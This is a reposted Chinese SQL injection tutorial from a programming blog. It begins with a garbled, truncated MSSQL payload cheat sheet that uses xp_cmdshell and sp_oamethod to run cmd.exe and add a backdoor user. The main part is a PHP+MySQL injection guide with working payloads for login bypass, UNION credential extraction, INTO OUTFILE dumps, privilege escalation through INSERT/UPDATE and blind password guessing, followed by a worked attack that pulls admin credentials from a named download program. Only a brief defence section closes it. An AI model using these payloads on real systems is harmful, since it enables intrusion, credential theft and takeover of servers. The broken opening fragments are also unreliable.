3.猜帐号数目 如果遇到0< 返回正确页面 1 <返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
blank>_cmdshell)–
xplog70.dll–
_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–
_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$Content$nbsp; /add–
run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点” -v “e”,”e:\”–
run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_blank
>_name=/, values=@test OUTPUT insert into paths(path) values(@test)–
;use ku1;–
;create table cmd (str image);– 建立image类型的表cmd
_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaonian
P_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup
blank>_addlogin hax)
您正在看的SQLserver教程是:sql注入语句。[user] where username=victim and right(left(userp
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x
[ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobje
字段列如:1) [ where 条件]
s=192.168.0.1,1433;,select * from table2) select * from database..table2
=e:\web\down.bak;–
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where
_oamethod @o, run, NULL, notepad.exe–
declare @o int, @f int, @t int
; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetp
roperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your
sequel servers are belong to us, 528 waitfor delay 00:00:05–
以下实例,作者angel
php+Mysql的注入
注:在没有具体说明的情况下,我们假设magic_quotes_gpc均为off。
php+Mysql注入的误区
很多人认为在PHP+MYSQL下注入一定要用到单引号,或者是没有办法像MSSQL那样可以使用“declare @a sysname select @a=
为什么呢?因为不管在什么语言里,在引号(包括单双)里,所有字符串均是常量,即使是dir这样的命令,也紧紧是字符串而已,并不能当做命令执行,除非是这样写的代码:
| $command = “dir c:\”; system($command); |
否则仅仅只是字符串,当然,我们所说的命令不单指系统命令,我们这里说的是SQL语句,要让我们构造的SQL语句正常执行,就不能让我们的语句变成字符串,那么什么情况下会用单引号?什么时候不用呢?看看下面两句SQL语句:
| ①SELECT * FROM article WHERE articleid=’$id’ ②SELECT * FROM article WHERE articleid=$id |
两种写法在各种程序中都很普遍,但安全性是不同的,第一句由于把变量$id放在一对单引号中,这样使得我们所提交的变量都变成了字符串,即使包含了正确的SQL语句,也不会正常执行,而第二句不同,由于没有把变量放进单引号中,那我们所提交的一切,只要包含空格,那空格后的变量都会作为SQL语句执行,我们针对两个句子分别提交两个成功注入的畸形语句,来看看不同之处。
① 指定变量$id为: ②指定变量$id为: |
$sql = “SELECT * |
由于没有用单引号包含变量,才给pinkeyes这个家伙有机可乘,所以大家在写PHP程序的时候,记得用单引号把变量包含起来。当然,必要的安全措施是必不可少的。
简单的例子
CREATE TABLE `user` ( # INSERT INTO `user` VALUES (1, ‘angel’, ‘mypass’); |
验证用户文件的代码如下:
mysql_connect($servername,$dbusername,$dbpassword) or die (“数据库连接失败”); $sql = “SELECT * FROM user WHERE username=’$username’ AND password=’$password'”; $result = mysql_db_query($dbname, $sql); if (empty($userinfo)) echo “ SQL Query:$sql |
这时我们提交:
http://127.0.0.1/injection/user.php?username=angel’ or 1=1 |
就会返回:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13 SQL Query:SELECT * FROM user WHERE username=’angel’ or 1=1′ AND password=” PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13 |
看到了吗?单引号闭合后,并没有注释掉后面的单引号,导致单引号没有正确配对,所以由此可知我们构造的语句不能让Mysql正确执行,要重新构造:
http://127.0.0.1/injection/user.php?username=angel’ or ‘1=1 |
这时显示“登陆成功”,说明成功了。或者提交:
http://127.0.0.1/injection/user.php?username=angel’/* |
语句构造
PHP+MYSQL注入的博大精深不仅仅体现在认证体系的饶过,语句的构造才是最有趣味的地方,但构造语句和ACCESS、MSSQL都有少许不同,但同样可以发挥得淋漓尽致。看下面的例子。
一、搜索引擎
Search result
mysql_connect($servername,$dbusername,$dbpassword) or die (“数据库连接失败”); $keywords = $_GET[‘keywords’]; $sql = “SELECT * FROM “.$db_prefix.”article WHERE title LIKE ‘%$keywords%’ $search ORDER BY title DESC”; echo “ SQL Query:$sql “; if ($tatol <=0){ |
一般程序都是这样写的,如果缺乏变量检查,我们就可以改写变量,达到“注入”的目的,尽管没有危害,当我们输入“___” 、“.__ ”、“%”等类似的关键字时,会把数据库中的所有记录都取出来。如果我们在表单提交:
%’ ORDER BY articleid/* |
SQL语句就被改变成下面的样子了,
SELECT * FROM article WHERE title LIKE ‘%%’ ORDER BY articleid/*%’ ORDER BY title DESC |
就会列出所有记录,包括被隐藏的,还可以改变排列顺序。这个虽然危害不大,也算是注入的一种方式了吧?
二、查询字段
查询字段又可以分成两种,本表查询和跨表查询,这两种查询和ACCESS、MSSQL差不多,甚至更强大、更灵活、更方便。不知道为什么就是有人认为比ASP难?我们在ASP中经常使用的个别函数在PHP里要有小小的改动,如下:
① 本表查询
看下面一条SQL语句,多用在论坛或者会员注册系统查看用户资料的,
mysql_connect($servername,$dbusername,$dbpassword) or die (“数据库连接失败”); $sql = “SELECT * FROM user WHERE username=’$username'”; if (!$row) { SQL Query:$sql echo “你要查询的用户ID是:$row[userid]\n”; SQL Query:$sql |
当我们提交的用户名为真时,就会正常返回用户的ID,如果为非法参数就会提示相应的错误,由于是查询用户资料,我们可以大胆猜测密码就存在这个数据表里(现在我还没有碰见过密码是单独存在另一个表的程序),记得刚才的身份验证程序吗?和现在的相比,就少了一个AND条件,如下:
SELECT * FROM user WHERE username=’$username’ AND password=’$password’SELECT * FROM user WHERE username=’$username’ |
http://127.0.0.1/injection/user.php?username=angel’ and password=’mypass |
这个是绝对为真的,因为我们这样提交上面的SQL语句变成了下面的样子:
SELECT * FROM user WHERE username=’angel’ AND password=’mypass’ |
但在实际的攻击中,我们是肯定不知道密码的,假设我们知道数据库的各个字段,下面我们就开始探测密码了,首先获取密码长度:
http://127.0.0.1/injection/user.php?username=angel’ and LENGTH(password)=’6 |
在ACCESS中,用LEN()函数来获取字符串长度,在MYSQL中,要使用LENGTH(),只要没有构造错误,也就是说SQL语句能正常执行,那返回结果无外乎两种,不是返回用户ID,就是返回“该记录不存在”。当用户名为angel并且密码长度为6的时候返回真,就会返回相关记录,是不是和ASP里一样?再用LEFT()、RIGHT()、MID()函数猜密码:
http://127.0.0.1/injection/user.php?username=angel’ and LEFT(password,1)=’m |
看,密码不是出来了吗?简单吧?当然实际情况会有不少条件限制,下面还会讲到这个例子的深入应用。
② 跨表查询
这部分就和ASP有点出入了,除了一定要用UNION连接两条SQL语句,最难掌握的就是字段的数量,如果看过MYSQL参考手册,就知道了在 SELECT 中的 select_expression (select_expression 表示你希望检索的列[字段]) 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。简单的说,也就是UNION后面查选的字段数量、字段类型都应该与前面的SELECT一样,而且,如果前面的SELECT为真,就同时返回两个SELECT的结果,当前面的SELECT为假,就会返回第二个SELECT所得的结果,某些情况会替换掉在第一个SELECT原来应该显示的字段,如下图:
看了这个图直观多了吧?所以应该先知道前面查询表的数据表的结构。如果我们查询两个数据表的字段相同,类型也相同,我们就可以这样提交:
SELECT * FROM article WHERE articleid=’$id’ UNION SELECT * FROM…… |
如果字段数量、字段类型任意一个不相同,就只能搞清除数据类型和字段数量,这样提交:
SELECT * FROM article WHERE articleid=’$id’ UNION SELECT 1,1,1,1,1,1,1 FROM…… |
否则就会报错:
The used SELECT statements have a different number of columns |
CREATE TABLE `article` ( # INSERT INTO `article` VALUES (1, ‘我是一个不爱读书的孩子’, ‘中国的教育制度真是他妈的落后!如果我当教育部长。我要把所有老师都解雇!’); |
这个表的字段类型分别是int、varchar、text,如果我们用UNION联合查询的时候,后面的查询的表的结构和这个一样。就可以用“SELECT *”,如果有任何一个不一样,那我们只能用“SELECT 1,1,1,1……”了。
下面的文件是一个很标准、简单的显示文章的文件,很多站点都是这种页面没有过滤,所以成为最明显的注入点,下面就拿这个文件作为例子,开始我们的注入实验。
mysql_connect($servername,$dbusername,$dbpassword) or die (“数据库连接失败”); $sql = “SELECT * FROM article WHERE articleid=’$id'”; if (!$row) SQL Query:$sql echo “title SQL Query:$sql |
正常情况下,我们提交这样的一个请求:
http://127.0.0.1/injection/show.php?id=1 |
SELECT * FROM article WHERE articleid=’$id’ UNION SELECT * FROM user …… |
由于这个代码是有单引号包含着变量的,我们现在提交:
http://127.0.0.1/injection/show.php?id=1′ union select 1,username,password from user/* |
按道理说,应该显示用户表的username、password两个字段的内容才对啊,怎么正常显示文章呢?如图:
其实,我们提交的articleid=1是article表里存在的,执行结果就是真了,自然返回前面SELECT的结果,当我们提交空的值或者提交一个不存在的值,就会蹦出我们想要的东西:
http://127.0.0.1/injection/show.php?id=’ union select 1,username,password from user/* |
如图:
现在就在字段相对应的地方显示出我们所要的内容。如果还不清楚思路以及具体的应用,后面还会讲到一些高级的技巧。
三、导出文件
这个是比较容易构造但又有一定限制的技术,我们经常可以看见以下的SQL语句:
select * from table into outfile ‘c:/file.txt’ |
但这样的语句,一般很少用在程序里,有谁会把自己的数据导出呢?除非是备份,但我也没有见过这种备份法。所以我们要自己构造,但必须有下面的前提条件:
- 必须导出到能访问的目录,这样才能下载。
- 能访问的目录必须要有可写的权限,否则导出会失败。
- 确保硬盘有足够的容量能容下导出的数据,这个很少见。
- 确保要已经存在相同的文件名,会导致导出失败,并提示:“File ‘c:/file.txt’ already exists”,这样可以防止数据库表和文件例如/etc/passwd被破坏。
我们继续用上面的user.php和show.php两个文件举例,如果一个一个用户猜解实在是太慢了,如果对方的密码或者其他敏感信息很复杂,又不会写Exploit,要猜到什么时候啊?来点大范围的,直接导出全部数据好了。user.php文件的查询语句,我们按照into outfile的标准格式,注入成下面的语句就能导出我们需要的信息了:
SELECT * FROM user WHERE username=’$username’ into outfile ‘c:/file.txt’ |
知道怎么样的语句可以实现我们的目的,我们就很容易构造出相应的语句:
http://127.0.0.1/injection/user.php?username=angel’ into outfile ‘c:/file.txt |
出现了错误提示,但从返回的语句看来,我们的SQL语句确实是注入正确了,即使出现错误,也是查询的问题了,文件还是乖乖的被导出了,如图:
由于代码本身就有WHERE来指定一个条件,所以我们导出的数据仅仅是满足这个条件的数据,如果我们想导出全部呢?其实很简单,只要使这个WHERE条件为假,并且指定一个成真的条件,就可以不用被束缚在WHERE里了,来看看经典1=1发挥作用了:
http://127.0.0.1/injection/user.php?username=’ or 1=1 into outfile ‘c:/file.txt |
实际的SQL语句变为:
SELECT * FROM user WHERE username=” or 1=1 into outfile ‘c:/file.txt’ |
但是跨表的导出文件的语句该怎么构造呢?还是用到UNION联合查询,所以一切前提条件都应该和UNION、导出数据一样,跨表导出数据正常情况下应该相下面的一样:
SELECT * FROM article WHERE articleid=’1′ union select 1,username,password from user into outfile ‘c:/user.txt’ |
这样可以导出文件了,如果我们要构造就提交:
http://127.0.0.1/injection/show.php?id=1′ union select 1,username,password from user into outfile ‘c:/user.txt |
文件是出来了,可是有一个问题,由于前面的查询articleid=’1’为真了,所以导出的数据也有整个文章的一部分,如图:
所以我们把应该使前面的查询语句为假,才能只导出后面查询的内容,只要提交:
http://127.0.0.1/injection/show.php?id=’ union select 1,username,password from user into outfile ‘c:/user.txt |
这样才能得到我们想要的资料:
值得注意的是想要导出文件,必须magic_quotes_gpc没有打开,并且程序也没有用到addslashes()函数,还有不能对单引号做任何过滤,因为我们在提交导出路径的时候,一定要用引号包含起来,否则,系统不会认识那是一个路径,也不用尝试用char()或者什么函数,那是徒劳。
INSERT
如果大家认为MYSQL中注入仅仅适用于SELECT就大错特错了,其实还有两个危害更大的操作,那就是INSERT和UPDATE语句,这类例子不多,先面先说说INSERT,这主要应用于改写插入的数据,我们来看个简单而又广泛存在的例子,看看下面的数据结构:
CREATE TABLE `user` ( |
其中的userlevel代表用户的等级,1是普通用户,2是普通管理员,3是超级管理员,一个注册程序默认是注册成普通用户,如下:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES (”, ‘$username’, ‘$password’, ‘$homepage’, ‘1’); |
默认userlevel字段是插入1,其中的变量都是没有经过过滤就直接写入数据库的,不知道大家有什么想法?对,就是直接注入,使我们一注册就是超级管理员。我们注册的时候,构造$homepage变量,就可以达到改写的目的,指定$homepage变量为:
http://4ngel.net’, ‘3’)# |
插入数据库的时候就变成:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES (”, ‘angel’, ‘mypass’, ‘http://4ngel.net’, ‘3’)#’, ‘1’); |
UPDATE
和INSERT相比,UPDATE的应用更加广泛,如果过滤不够,足以改写任何数据,还是拿刚才的注册程序来说,数据结构也不变,我们看一下用户自己修改自己的资料,SQL语句一般都是这样写的:
UPDATE user SET password=’$password’, homepage=’$homepage’ WHERE id=’$id’ |
用户可以修改自己的密码和主页,大家有什么想法?总不至于还是提升权限吧?程序中的SQL语句又没有更新userlevel字段,怎么提升啊?还是老办法,构造$homepage变量, 指定$homepage变量为:
http://4ngel.net’, userlevel=’3 |
整个SQL语句就变成这样:
UPDATE user SET password=’mypass’, homepage=’http://4ngel.net’, userlevel=’3′ WHERE id=’$id’ |
UPDATE user SET password=’MD5($password)’, homepage=’$homepage’ WHERE id=’$id’ |
尽管密码被加密了,但我们还是可以构造我们需要的语句,我们指定$password为:
mypass)’ WHERE username=’admin’# |
这时整个语句变为:
UPDATE user SET password=’MD5(mypass)’ WHERE username=’admin’#)’, homepage=’$homepage’ WHERE id=’$id’ |
这样就更改了更新的条件,我管你后面的代码是不是在哭这说:我们还没有执行啊。当然,也可以从$id下手,指定$id为:
‘ OR username=’admin’ |
这时整个语句变为:
UPDATE user SET password=’MD5($password)’, homepage=’$homepage’ WHERE id=” OR username=’admin’ |
高级应用
1、 使用MYSQL内置函数
我们在ACCESS、MSSQL中的注入,有很多比较高级的注入方法,比如深入到系统,猜中文等,这些东西,在MYSQL也能很好得到发挥,其实在MYSQL有很多内置函数都可以用在SQL语句里,这样就可以使我们能在注入时更灵活,得到更多关于系统的信息。有几个函数是比较常用的:
DATABASE() |
各个函数的具体作用大家可以查阅MYSQL手册,比如下面这句UPDATE:
UPDATE article SET title=$title WHERE articleid=1 |
我们可以指定$title为以上的各个函数,因为没有被引号包含,所以函数是能正确执行的:
UPDATE article SET title=DATABASE() WHERE id=1 |
灵活运用MYSQL内置的函数,可以获得不少有用的信息,比如数据库版本、名字、用户、当前数据库等,比如前面跨表查询的例子,提交:
http://127.0.0.1/injection/show.php?id=1 |
可以看到一篇文章,我们怎么样才能知道MYSQL数据库的相关信息呢?同样也是用MYSQL内置函数配合UNION联合查询,不过相比之下就简单得多了,甚至还可以读取文件!既然要用到UNION,同样要满足UNION的条件——字段数、数据类型相同。如果我们知道了数据结构,直接构造:
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version() |
#!/usr/bin/perl $ARGC = @ARGV; $path=shift; @char = unpack(‘C*’, $path); $asc=join(“,”,@char); print $asc; |
2、不加单引号注入
注:现在我们假设magic_quotes_gpc为on了。
众所周知,整形的数据是不需要用引号引起来的,而字符串就要用引号,这样可以避免很多问题。但是如果仅仅用整形数据,我们是没有办法注入的,所以我需要把我们构造的语句转换成整形类型,这个就需要用到CHAR(),ASCII(),ORD(),CONV()这些函数了,举个简单的例子:
SELECT * FROM user WHERE username=’angel’ |
如何使$username不带引号呢?很简单我们这样提交就可以了。
SELECT * FROM user WHERE username=char(97,110,103,101,108) |
其他函数大家自己去测试好了,但是前提就如上面所说的,我们可以构造的变量不被引号所包含才有意义,不然我们不管构造什么,只是字符串,发挥不了作用,比如前面猜密码的例子(user,php),我们把查询条件改为userid:
SELECT * FROM user WHERE userid=userid |
按照正常的,提交:
http://127.0.0.1/injection/user.php?userid=1 |
就可以查询userid为1的用户资料,因为1是数字,所以有没有引号都无所谓,但是如果我们构造:
http://127.0.0.1/injection/user.php?userid=1 and password=mypass |
绝对错误,因为mypass是字符串,除非提交:
http://127.0.0.1/injection/user.php?userid=1 and password=’mypass’ |
由于magic_quotes_gpc打开的关系,这个是绝对不可能的。引号会变成/’,我们有什么办法可以把这些字符串变成整形数据吗?就是用CHAR()函数,如果我们提交:
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115) |
正常返回,实践证明,我们用CHAR()是可行的,我们就把CHAR()用进LEFT函数里面逐位猜解!
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109) |
正常返回,说明userid为1的用户,password字段第一位是char(109),我们继续猜:
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121) |
又正常返回,说明正确,但这样影响到效率,既然是整形,我们完全可以用比较运算符来比较:
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100) |
然后适当调整char()里面的数字来确定一个范围,很快就可以猜出来,到了后面的时候,还是可以用比较运算符来比较:
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111) |
而原来已经猜好的不用改变了,很快就可以猜完:
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char(109,121,112,97,115,115) |
然后在mysql>命令提示符下或者在phpMyadmin里面执行:
select char(109,121,112,97,115,115) |
就会返回:mypass
当然也可以使用SUBSTRING(str,pos,len)和MID(str,pos,len)函数,从字符串 str 的 pos 位置起返回 len 个字符的子串。这个和ACCESS是一样的。还是刚才的例子,我们猜password字段的第三位、第四位试试,第三位是p,第四位是a,我们这样构造:
http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112) |
我们要的结果就迸出来了。当然,如果觉得麻烦,还可以用更简单的办法,就是利用ord()函数,具体作用可以去查看MYSQL参考手册,该函数返回的是整形类型的数据,可以用比较运算符进行比较、当然得出的结果也就快多了,也就是这样提交:
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111 |
这样我们就得出结果了,然后我们再用char()函数还原出来就好了。至于其他更多函数,大家可以自己去试验,限于篇幅也不多说了。
3、快速确定未知数据结构的字段及类型
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 |
有多少个“1”就表示有多少个字段,可以慢慢试,如果字段数不相同,就肯定会出错,如果字段数猜对了,就肯定会返回正确的页面,字段数出来了,就开始判断数据类型,其实也很容易,随便用几个字母代替上面的1,但是由于magic_quotes_gpc打开,我们不能用引号,老办法,还是用char()函数,char(97)表示字母“a”,如下:
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97) |
如果是字符串,那就会正常显示“a”,如果不是字符串或文本,也就是说是整形或布尔形,就会返回“0”,如图:
判断最主要靠什么?经验,我以前一直都说,经验很重要,丰富经验能更好的作出正确的判断,因为程序的代码是千变万化的,我们这里是只是举个最简单的例子,这里由于局限性,程序都是我自己写、自己测试的。方法因程序而异。希望大家在实战中,注意区别,不要照搬,灵活运用才是根本。
4、猜数据表名
在快速确定未知数据结构的字段及类型的基础上,我们又可以进一步的分析整个数据结构,那就是猜表名,其实使用UNION联合查询的时候,不管后面的查询怎么“畸形”,只要没有语句上的问题,都会正确返回,也就是说,我们可以在上面的基础上,进一步猜到表名了,比如刚才我们提交:
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 |
返回正常的内容,就说明这个文件查询的表内是存在3个字段的,然后我们在后面加入from table_name,也就是这样:
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members |
site_article |
如果安全意识高的话,管理员会加个表名前缀,那猜解就很麻烦了,不过完全可以做一个表名列表来跑。这里就不多说了,后面会有一个具体的例子来解开一切迷茫^_^……
实例
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 |
注意,这里有19个“1”,返回正常的页面,我可以可以肯定字段没有变,我们也就别拖拉了,直接看看夜猫的默认用户数据表是否存在:
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user |
正常返回,如图,如果URL不清楚可以看标题那里:
嗯,这个HB还真是够懒的,这么烂的程序也不知道先修改一下再用,不过也是,没有多少人和我一样有闲心先去加固程序才用的,再看默认的用户id还在不在?
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 |
忘记了,就算不存在id为1的用户,前面的查询是真的,照样会正常返回数据库的软件信息,我们只能让前面的查询为假,才能使后面查询的结果显示出来,但我们要注意一点,show.php文件里面有这样一段代码:
if ($id > “0” && $id < "" ):
无记录 \n”;
|
也就是说我们的ID的值再怎么离谱也不能在0和之外,HB的软件肯定不会超过10000个的,我们就提交:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 |
正常返回了,表格里的数据全部是“1”,说明ID还在哦。如果不存在的话,页面只返回的数据全部是不详,因为程序的判断是如果数据为空就显示不详。现在确定了ID存在后,还要确定是不是管理员才行啊:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1 |
程序规定groupid为1是超级管理员,既然都返回正确信息了,我们就直接构造畸形语句,暴出我们需要的用户名和密码,嘿嘿,首先看看ymdown表的数据结构,因为show.php是查询它的,所以我们应该看它的数据结构。
CREATE TABLE ymdown ( |
用户名和密码的数据类型都是varchar,所以我们要选择ymdown表里数据类型是varchar来,如果把varchar的数据写到int的地方当然是不可能显示的了,由于updatetime(更新日期)的长度是20,可能会出现显示不完全的情况,我们就把用户名显示在name(软件标题)那里,密码显示在size(文件大小)那里好了,在19个“1”中,name和size分别是第二个和第四个,我们提交:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 |
结果成功返回了我们所需要的用户名和密码,如图:
验证测试结果
整个渗透过程就结束了,不过由于黑白把入口给改了,无法登陆,但我们仅仅测试注入,目的已经达到了,就没有必要进后台了,我后来又继续构造SQL语句来验证我们获取的密码是否正确,依次提交:
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 |
注入的防范
$id = intval($id); |
或者这样写:
mysql_query(“SELECT * FROM article WHERE articleid=”.intval($id).””) |
$username = addslashes($username); |
或者这样写:
mysql_query(“SELECT * FROM members WHERE userid=”.addslashes($username).””) |
使用addslashes()函数还可以避免引号配对错误的情况出现。而刚才的前面搜索引擎的修补方法就是直接把“_”、“%”转换为“\_”“\%”就可以了,当然也不要忘记使用addslashes()函数。具体代码如下:
$keywords = addslashes($keywords); |
不用像ASP那样,过滤一点变量,就要写一大堆的代码,就是上面的一点点代码,我们就可以把本文所有的问题解决了,是不是很简便?
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/215934.html原文链接:https://javaforall.net
